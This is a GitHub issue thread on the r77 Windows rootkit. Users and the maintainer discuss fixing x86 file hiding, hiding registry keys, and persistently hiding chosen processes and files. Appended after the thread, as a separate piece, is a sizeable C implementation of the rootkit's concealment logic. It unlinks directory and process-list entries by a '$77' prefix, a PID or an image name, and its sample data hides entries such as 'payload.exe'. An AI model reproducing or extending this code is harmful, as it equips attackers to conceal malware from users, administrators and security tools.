bytecode77 / r77-rootkit

Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections, etc.
https://bytecode77.com/r77-rootkit
BSD 2-Clause "Simplified" License
1.59k stars, 389 forks

Hiding files doesn't work on architecture x86 #2

Closed Roganced closed 3 years ago

Roganced commented 5 years ago

The problem is in the header, but I have one question: how can I hide registry keys, which API needs to be hooked for this, and is this possible in ring 3? Will you add this in the future?

P.S. Good work!

bytecode77 commented 5 years ago

I haven't worked on r77 recently; however, RegistryKey hiding is on the agenda and due to be done when I start working on it again.

You said you know what problem causes file hiding issues on x86?

Roganced commented 5 years ago

I'm sorry, but I don't know how to solve the problem of hiding files. Are you planning to work on improving the rootkit in the near future? This project has no worthy analogues at the moment.

logan-x commented 5 years ago

Hello bytecode77, thank you for the solution you proposed. As for the x86 failure, I tested it and the problem is caused by MinHook. I replaced it with "mhook", so that it can run normally.

There is also a small problem: hiding the root directory will cause explorer.exe to crash. I will provide a PR later.

Thanks again for your project, which helped me a lot!

logan-x commented 5 years ago

Add a line to NewZwQueryDirectoryFile at the RtlCopyMemory call: pPrevious = pCurrent; Now you can hide the root directory.

bytecode77 commented 3 years ago

@logan-x I have tested your suggested fix and it works pretty well. Thank you very much for your input!

Currently, I'm working towards finalizing r77. Even though I haven't worked on it for a long time, I'm currently on it.

On the agenda:

  • Using detours instead of MinHook
  • Fix any x86 issues prior to any sort of release (no more beta releases before that)
  • Providing a proper toolchain and full technical documentation
  • Finalize implementation on Registry key/value hiding
  • Implement more entities in addition to processes, files and registry

I'm closing this issue for 0.6.x. Version 1.x is on its way.

GV13057911485 commented 3 years ago

Hello ByteCode77,

Thank you for your excellent job! I was very excited when I was testing your rootkit, almost perfect!! Now I am wondering, is there any interface I can use to tell the rootkit which specific files, directories and registry keys I want to hide?

I am still learning your rootkit, hope I can get more input, thank you, expert!

bytecode77 commented 3 years ago

Thank you, I am glad you like it!

Actually, there currently is the config system for hiding specific PIDs and TCP/UDP ports. Would you find it useful to hide specific process names or specific filenames or absolute paths using the config system?

Right now, I'm collecting a lot of input and prioritizing requests that a lot of users have. If you could provide me with some input and specific examples, I may better understand what is important to users of r77 :) There is, indeed, a ToDo list and I'm working on features that users request the most.

GV13057911485 commented 3 years ago

I love you guys so much! At the moment, I can see almost all functions are correct as you described in the documentation. Sure, I would like r77 to help me hide those specific items that I want.

I tried to hide one of my processes. I could do it via the "test console" only, and yes, it worked immediately, I was soooo happy! Thereafter, I rebooted the OS and found the process, which was hidden before rebooting, appeared again! I tried to write the PID into the registry, but it didn't work, because the PID kept changing every reboot.

I would like to hide some of my specified files and directories, but I didn't know how to do it, because I couldn't find a place to input the names of files or directories. So I had to rename them as "$77***"; they hid, but the process wouldn't work after renaming these items.

I hope these desired abilities will be available soon.

Thank you guys anyway, the r77 is amazing!

bytecode77 commented 3 years ago

When hiding by PID, basically you need to write the PID every time the process starts. One example is the r77 service, which writes the svc32 and svc64 values under pid. Make sure to overwrite the same value name every time to avoid accumulation of PIDs. This is a good solution for startup programs, where a prefix is unwanted or not possible (not possible for process hollowing). There is a maximum of ~1 second between writing the PID and hiding taking effect.

Implementing hiding by a specified name using the config system is one of the next items on the agenda, as it was requested several times by now. If you want to modify the code in the meantime, it's a simple change in the HookedNtQuerySystemInformation. There is an if-statement that checks for the prefix and hidden PID.

You're welcome :)
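Added example (my own illustration, not code from r77 or from anyone in this thread) of the list unlinking that both fixes above turn on: logan-x's pPrevious = pCurrent correction in the NtQueryDirectoryFile hook, and the prefix/PID check bytecode77 points to in HookedNtQuerySystemInformation, with hide-by-name added as the extension he mentions. Both NT structures chain their entries through a leading NextEntryOffset, so one walker serves both hooks. The struct layouts are cut-down stand-ins, the $77 sample names, the PIDs and the hidden-PID/name lists are constructed, and every function name is mine.

```c
/* Added example, not r77's code: one in-place filter for the two NextEntryOffset-chained buffers the
 * thread discusses. The stand-in structs keep only the fields the filter reads; the real
 * FILE_DIRECTORY_INFORMATION and SYSTEM_PROCESS_INFORMATION are larger, with variable-length names. */
#include <stdint.h>
#include <string.h>
typedef uint32_t ULONG; typedef uint16_t WCHAR;
typedef struct { ULONG NextEntryOffset; ULONG FileNameLength; WCHAR FileName[16]; } DIR_ENTRY;
typedef struct { ULONG NextEntryOffset; ULONG UniqueProcessId; ULONG ImageNameLength; WCHAR ImageName[16]; } PROC_ENTRY;
#define NEXT(p) (*(ULONG *)(p))   /* both structs begin with NextEntryOffset; 0 marks the last entry */
typedef int (*hide_fn)(const unsigned char *entry, const void *ctx);

/* Unlink every entry `hide` flags; returns how many stay visible (0: caller reports an empty result).
 * prev advances only over kept entries. Advancing it over hidden ones too (the bug the thread fixes
 * with "pPrevious = pCurrent") makes the splice point mid-entry, which is how explorer.exe crashes. */
static int chain_unlink(unsigned char *buf, size_t len, hide_fn hide, const void *ctx)
{
    unsigned char *prev = NULL, *cur = buf; int visible = 0;
    for (;;) {
        ULONG next = NEXT(cur);
        if (hide(cur, ctx)) {
            if (prev == NULL) {                  /* first entry: nothing points at it, shift the tail down */
                if (next == 0) return 0;
                memmove(cur, cur + next, len - (size_t)(cur - buf) - next);
                len -= next;
                continue;                        /* re-examine whatever now sits at cur */
            }
            NEXT(prev) = next ? NEXT(prev) + next : 0;   /* splice cur out; prev stays put */
        } else {
            visible++;
            prev = cur;                          /* only a kept entry becomes prev */
        }
        if (next == 0) return visible;
        cur += next;
    }
}
static unsigned char *nth_visible(unsigned char *buf, int idx)   /* idx-th entry a consumer reaches, or NULL */
{
    for (unsigned char *cur = buf;; cur += NEXT(cur)) {
        if (idx-- == 0) return cur;
        if (NEXT(cur) == 0) return NULL;
    }
}
static ULONG widen(WCHAR *dst, const char *src)   /* ASCII sample name -> UTF-16; returns byte length */
{
    ULONG n = (ULONG)strlen(src); if (n > 16) n = 16;
    for (ULONG i = 0; i < n; i++) dst[i] = (WCHAR)src[i];
    return n * (ULONG)sizeof(WCHAR);
}
static int wide_eq(const WCHAR *w, ULONG len_bytes, const char *s)
{
    size_t n = strlen(s);
    if (len_bytes != n * sizeof(WCHAR)) return 0;
    for (size_t i = 0; i < n; i++) if (w[i] != (WCHAR)s[i]) return 0;
    return 1;
}
static int has_77_prefix(const WCHAR *w, ULONG len_bytes)   /* the $77 naming convention */
{
    return len_bytes >= 3 * sizeof(WCHAR) && w[0] == '$' && w[1] == '7' && w[2] == '7';
}
static int hide_dir(const unsigned char *e, const void *ctx)   /* NtQueryDirectoryFile side */
{
    const DIR_ENTRY *d = (const DIR_ENTRY *)e; (void)ctx;
    return has_77_prefix(d->FileName, d->FileNameLength);
}
/* NtQuerySystemInformation side: $77 prefix, a configured PID (what a process writes under the pid
 * key at startup) or a configured image name (the hide-by-name extension asked for in the thread). */
typedef struct { const ULONG *pids; int npids; const char **names; int nnames; } HIDE_CFG;
static int hide_proc(const unsigned char *e, const void *ctx)
{
    const PROC_ENTRY *p = (const PROC_ENTRY *)e; const HIDE_CFG *c = ctx;
    if (has_77_prefix(p->ImageName, p->ImageNameLength)) return 1;
    for (int i = 0; i < c->npids; i++) if (p->UniqueProcessId == c->pids[i]) return 1;
    for (int i = 0; i < c->nnames; i++) if (wide_eq(p->ImageName, p->ImageNameLength, c->names[i])) return 1;
    return 0;
}
/* Constructed sample listings (not captured from a real system); hidden entries sit first, back to
 * back, in the middle and last, so every branch of chain_unlink runs. */
static unsigned char g_dir[6 * sizeof(DIR_ENTRY)], g_proc[6 * sizeof(PROC_ENTRY)];
static void build_samples(void)
{
    static const char *files[6] = { "$77a.dll", "$77b.dll", "keep1.txt", "$77c", "keep2.txt", "$77d" };
    static const char *procs[6] = { "", "System", "$77svc.exe", "payload.exe", "explorer.exe", "agent.exe" };
    static const ULONG pids[6]  = { 0, 4, 1234, 4242, 5000, 6000 };
    for (int i = 0; i < 6; i++) {
        DIR_ENTRY *d = (DIR_ENTRY *)(g_dir + i * sizeof(DIR_ENTRY));
        PROC_ENTRY *p = (PROC_ENTRY *)(g_proc + i * sizeof(PROC_ENTRY));
        d->NextEntryOffset = i < 5 ? (ULONG)sizeof(DIR_ENTRY) : 0; p->NextEntryOffset = i < 5 ? (ULONG)sizeof(PROC_ENTRY) : 0;
        d->FileNameLength = widen(d->FileName, files[i]);
        p->UniqueProcessId = pids[i]; p->ImageNameLength = widen(p->ImageName, procs[i]);
    }
}
static int hide_directory_entries(void) { return chain_unlink(g_dir, sizeof g_dir, hide_dir, NULL); }
static int hide_process_entries(void)
{
    static const ULONG pids[] = { 4242 }; static const char *names[] = { "agent.exe" };
    HIDE_CFG cfg = { pids, 1, names, 1 };        /* stand-ins for what the config key would supply */
    return chain_unlink(g_proc, sizeof g_proc, hide_proc, &cfg);
}
```

Keeping prev on the last kept entry is what makes the splice arithmetic (prev->NextEntryOffset += cur->NextEntryOffset) valid. The first entry cannot be spliced because nothing points at it, so the tail is shifted down over it instead, and a hook that ends up with zero visible entries has to turn that into the "no more entries" status rather than hand the caller an empty buffer. In the sample, the directory listing drops from six entries to keep1.txt and keep2.txt, and the process listing keeps the Idle process, System and explorer.exe while $77svc.exe, PID 4242 and agent.exe disappear.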